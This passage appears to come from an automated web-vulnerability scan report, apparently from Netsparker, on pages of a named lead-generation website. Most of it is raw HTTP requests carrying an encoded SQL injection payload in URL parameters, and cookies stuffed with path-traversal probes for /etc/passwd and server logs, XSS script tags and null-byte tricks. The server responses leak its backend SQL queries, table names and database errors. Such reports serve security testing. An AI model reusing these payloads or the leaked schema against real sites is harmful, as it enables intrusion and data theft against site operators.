convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=evflpkkihckjvokf3onkcekcl6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/dima00/project.php

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=88ulg04btkiuje7o0bi9imeqk7; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2sbtagus4fhiuntou2ctogm7j1; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


